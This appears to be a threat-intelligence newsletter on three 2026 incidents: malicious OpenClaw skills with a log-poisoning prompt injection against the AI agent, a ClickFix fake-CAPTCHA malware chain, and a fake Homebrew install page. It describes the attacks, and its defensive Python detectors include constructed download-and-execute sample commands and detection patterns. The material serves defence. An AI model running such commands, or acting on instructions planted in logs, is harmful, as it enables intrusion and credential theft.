Trending Topics

TRENDING TOPICS FEB 18, 2026

Update: OpenClaw Ecosystem Hit by Skill Marketplace Malware and Log Injection Weakness

A coordinated supply-chain campaign named ClawHavoc targeted OpenClaw’s official skill marketplace, ClawHub, by flooding it with at least 1,184 malicious Skills published over time. Attackers registered developer accounts, uploaded Skills that appeared legitimate, and then relied on documentation-driven social engineering to get users to run dangerous commands or install additional “helper” downloads. Antiy reported 12 malicious author IDs, with one uploader responsible for 677 packages, and noted that some high-download packages remained reachable even after removals. Analysis of the poisoned Skills shows multiple impact paths: staged downloads that pull additional malware, embedded reverse-shell behavior in scripts, and direct data theft. One reported example posed as a weather tool and attempted to exfiltrate OpenClaw’s local configuration file, which may contain paid AI service keys and other secrets. On macOS, an observed payload chain was tied to Atomic macOS Stealer, which is associated with credential and wallet-focused theft activity. In parallel, researchers disclosed a separate OpenClaw issue involving “log poisoning,” in which an attacker can insert hidden instructions into log files and later influence the agent when it reads those logs during troubleshooting. The weakness stems from unsanitized User-Agent and Origin header values being written to logs, with enough space to carry lengthy instruction blocks, and the attack can start with an unauthenticated connection attempt against exposed instances. The primary risks are decision hijacking and data leakage, not a classic software exploit, because the agent may treat the injected text as guidance during problem diagnosis. Maintainers patched the issue in version 2026.2.13 by sanitizing log inputs and limiting header sizes, and a fix is also referenced in a GitHub security advisory with an associated pull request. 
Together, these incidents show two pressure points in AI agent ecosystems: unvetted third-party extensions and indirect manipulation of an agent’s decision process through operational data. To reduce risk quickly, teams should upgrade OpenClaw to 2026.2.13 or later, remove untrusted Skills, re-check what is installed across endpoints, and rotate any exposed secrets, with priority on API keys, tokens, and credentials referenced by OpenClaw. Access to OpenClaw should be locked down behind strong authentication and network controls; the service should run under a least-privilege account; and internet exposure should be avoided unless explicitly required and tightly monitored. Platform operators should also strengthen store defenses by scanning packages and their documentation for suspicious commands, URLs, and downloader patterns, applying publisher-reputation controls that slow or block mass uploads, and using rapid takedown workflows to quarantine suspicious Skills before they gain traction.
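
The log-poisoning fix described above (sanitize header values, limit their size) can be sketched as follows. This is an added example, not OpenClaw's actual patch: the 200-character cap, the event name, and the function names are assumptions, and the sample headers are constructed.

```python
import json
import re
import unicodedata

MAX_HEADER_LOG_LEN = 200  # assumed cap; the page does not give the patched limit

# Unicode categories that can break a log line or hide text from a reviewer:
# Cc control chars (CR, LF, ESC), Cf format chars (zero-width, bidi overrides),
# Zl/Zp line and paragraph separators.
_UNSAFE_CATEGORIES = {"Cc", "Cf", "Zl", "Zp"}


def sanitize_header(value: str, max_len: int = MAX_HEADER_LOG_LEN) -> tuple[str, bool]:
    """Return (safe_value, was_truncated) for an untrusted header value."""
    replaced = "".join(
        " " if unicodedata.category(ch) in _UNSAFE_CATEGORIES else ch for ch in value
    )
    collapsed = re.sub(r"\s+", " ", replaced).strip()
    return collapsed[:max_len], len(collapsed) > max_len


def format_rejected_connection(remote_addr: str, headers: dict[str, str]) -> str:
    """Build one JSON log line; header text stays inside quoted string fields."""
    record = {"event": "connect_rejected", "remote_addr": remote_addr}
    for name in ("User-Agent", "Origin"):
        safe, truncated = sanitize_header(headers.get(name, ""))
        key = name.lower().replace("-", "_")
        record[key] = safe
        record[key + "_truncated"] = truncated
    return json.dumps(record, ensure_ascii=True)


# Constructed sample: a header that tries to start a fake log entry and carry
# a long block of text, plus an Origin padded with invisible format characters.
SAMPLE_HEADERS = {
    "User-Agent": "Mozilla/5.0\r\n[INFO] diagnostics: " + "follow the steps below " * 40,
    "Origin": "https://example.invalid\u202e\u200b",
}

if __name__ == "__main__":
    print(format_rejected_connection("203.0.113.7", SAMPLE_HEADERS))
```

The attacker-supplied text can no longer open a new log line or exceed the cap, and the truncation flag tells a reviewer that an oversized header was sent.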

Fake CAPTCHA Click Triggers Multi-Stage Malware Spread Across an Enterprise

A recent incident at a major Polish organization shows how fake CAPTCHA pages using the ClickFix technique can turn a single user action into a broad internal compromise. The victim landed on a compromised website that displayed a Cloudflare-style verification prompt, but instead of validating anything, it instructed the user to open the Run dialog and execute a pasted command. That action launched a PowerShell download chain that pulled additional payloads from attacker-controlled domains and executed them on the endpoint. Investigators then found a clear DLL side-loading setup under the user profile, including a suspicious %APPDATA%\Intel folder containing a legitimate-looking executable alongside malicious DLLs, as well as additional oddly named DLLs in the local AppData path. The infection chain delivered two malware families, Latrodectus and Supper, which together enabled persistence, reconnaissance, and interactive remote control. This pattern is dangerous because it avoids exploiting a software flaw and instead relies on getting the user to run the attacker’s command, which can slip past controls that focus only on vulnerability-based attacks. Latrodectus served as the early-stage loader and backdoor, calling out to the attacker's infrastructure while sending system details that helped profile the environment and guide next steps. Analysis indicates a newer Latrodectus build with added evasion behavior, and recovered artifacts show it running extensive discovery commands to map the host and the organization’s domain relationships, including checks for trust paths, privileged groups, and installed security tools. Supper added the operational capability for deeper intrusion by establishing command-and-control, creating persistence through a Scheduled Task that also attempted cleanup to reduce forensic visibility, and supporting actions that can run programs remotely and enable proxy-based access for interactive control. 
The combined effect is a fast escalation path from a single compromised workstation into lateral movement, data theft, and ransomware preparation across the enterprise. To reduce exposure, organizations should harden endpoints against script-based downloads and execution, monitor for Run dialog and clipboard-driven command launches, and alert on suspicious PowerShell or cmd download patterns targeting unfamiliar domains. They should also block and hunt for DLL side-loading indicators in user-writable paths, monitor for suspicious scheduled tasks, and reinforce user guidance so employees treat unexpected verification prompts as hostile and report them rather than follow step-by-step instructions.
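
One way to express the "Run dialog plus download command" alert recommended above, as an added example rather than detection content from the investigation. The event field names, the approved-host list, and the sample events are constructed assumptions; map them to your own EDR or process-creation telemetry.

```python
import re
from urllib.parse import urlsplit

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
DOWNLOAD = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile"
    r"|curl|start-bitstransfer|bitsadmin)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\"|)]+", re.I)
APPROVED_HOSTS = {"intranet.corp.example"}  # assumption: hosts your tooling uses


def image_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event):
    """Score one process-creation event; None means nothing to report."""
    cmd = event["command_line"]
    if image_name(event["image"]) not in SHELLS or not DOWNLOAD.search(cmd):
        return None
    hosts = {urlsplit(u).hostname for u in URL.findall(cmd)}
    unfamiliar = sorted(h for h in hosts if h and h not in APPROVED_HOSTS)
    if not unfamiliar:
        return None
    # The Run dialog starts its child from explorer.exe, so that parent plus a
    # download-and-execute command is the ClickFix shape described above.
    from_explorer = image_name(event["parent_image"]) == "explorer.exe"
    executes = bool(EXECUTE.search(cmd))
    return {"host": event["host"], "unfamiliar": unfamiliar,
            "score": 1 + from_explorer + executes}


# Constructed process-creation events (not taken from the incident).
SAMPLE_EVENTS = [
    {"host": "WS-014", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iwr https://verify.example-lure.invalid/a | iex"'},
    {"host": "WS-020", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd /c ipconfig /all"},
    {"host": "WS-031", "parent_image": r"C:\Program Files\Deploy\agent.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": "pwsh -c irm https://intranet.corp.example/inventory.ps1 -OutFile inv.ps1"},
]


def hunt(events):
    return [a for a in map(assess, events) if a]
```

Only the first sample event is reported, with the maximum score of 3; the deployment agent fetching from an approved host and the plain `cmd` launch are ignored.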

Update: ClickFix Abuses Fake Homebrew Install to Steal macOS Credentials and Developer Secrets

A ClickFix campaign targets macOS developers by impersonating the Homebrew installation flow and turning a routine terminal paste into a malware launch. The operation uses typosquatted domains that closely resemble the real Homebrew site, including homabrews[.]org, hosted on infrastructure tied to 5[.]255[.]123[.]244. Victims land on a near-identical clone of brew[.]sh where the install command and copy button appear normal, but the copied command quietly points downloads to an attacker-controlled “raw” domain that mimics GitHub’s raw content service. This approach avoids exploiting a software flaw and instead relies on habit, since many developers routinely paste curl-to-shell commands without verifying the domain. Researchers flagged the primary domain multiple times shortly after it was registered in January 2026, showing how quickly these lures can be spun up and rotated. The key risk is that a single paste can hand attackers both local access and high-value credentials tied to development work. After execution, the script presents itself as a Homebrew installer while inserting a credential-harvesting step that repeatedly prompts for the macOS password and checks it until it succeeds. Once a valid password is captured, it pulls a secondary component from /tmp, passes the stolen password in an encoded form, and removes macOS quarantine markers to reduce security prompts. It then sets up persistence using a LaunchAgent that masquerades as a Homebrew updater, helping the activity blend into normal workstation behavior. The second-stage payload, Cuckoo Stealer, establishes an encrypted command-and-control channel and supports remote actions, including running commands, stealing data, and removing itself to cover its tracks. 
Data theft targets a wide set of sources: browser credentials and session tokens, Keychain content, Apple Notes data, Discord and Telegram sessions, VPN and FTP configurations, Steam session data, and a long list of cryptocurrency wallet files, and it can also capture screenshots and quietly collect files from common user folders. To limit detection and reduce unwanted attention, it checks system language settings and avoids machines configured for certain CIS-region languages, and researchers linked the infrastructure to a broader cluster of similar terminal-phishing pages aimed at developer tools. To reduce exposure, teams should require installs only from the official brew[.]sh domain, train staff to verify the URL bar before copying commands, block known typosquats at DNS and web gateways, alert on terminal commands that fetch installers from unapproved raw-content domains, monitor for new or suspicious LaunchAgents that imitate developer utilities, and assume credential exposure by rotating passwords, revoking tokens, and auditing impacted macOS endpoints for unauthorized persistence and data access.
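
The "alert on terminal commands that fetch installers from unapproved raw-content domains" control above can be checked with exact host matching, shown here as an added example that is not from the researchers' report. The allowlist is an assumption based on the official Homebrew one-liner fetching from raw.githubusercontent.com, and the lookalike and pipe commands are constructed samples on reserved `.invalid` names.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host an approved install command may fetch from.
APPROVED_HOSTS = {"raw.githubusercontent.com"}

URL_RE = re.compile(r"https?://[^\s\"'()|<>]+", re.I)
FETCHER = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b")
SHELL_SUBST = re.compile(r"\b(ba|z|da)?sh\b[^|;]*(\$\(|<\()\s*(curl|wget)\b")


def review_command(command):
    """Return a verdict for a command a user is about to paste into a terminal."""
    runs_remote_code = bool(FETCHER.search(command)) and bool(
        PIPE_TO_SHELL.search(command) or SHELL_SUBST.search(command))
    findings = []
    for url in URL_RE.findall(command):
        parts = urlsplit(url)
        host = (parts.hostname or "").rstrip(".")
        if parts.scheme.lower() != "https":
            findings.append((host, "not fetched over https"))
        if not host.isascii() or "xn--" in host:
            findings.append((host, "internationalized (possible homoglyph) host"))
        # Exact match only: substring or prefix checks pass lookalike hosts.
        if host not in APPROVED_HOSTS:
            findings.append((host, "host not on allowlist"))
    verdict = "block" if runs_remote_code and findings else "allow"
    return {"verdict": verdict, "runs_remote_code": runs_remote_code,
            "findings": findings}


OFFICIAL_COMMAND = ('/bin/bash -c "$(curl -fsSL '
                    'https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"')
# Constructed lookalikes: the approved name used as a prefix, and a plain-http pipe.
LOOKALIKE_COMMAND = ('/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com'
                     '.cdn-mirror.invalid/Homebrew/install/HEAD/install.sh)"')
PIPE_COMMAND = "curl -fsSL http://brew-setup.example.invalid/install.sh | bash"

if __name__ == "__main__":
    for cmd in (OFFICIAL_COMMAND, LOOKALIKE_COMMAND, PIPE_COMMAND):
        print(review_command(cmd))
```

The lookalike command is blocked even though it contains the string `raw.githubusercontent.com`, which is the case a substring or "starts with" check would miss.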

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.
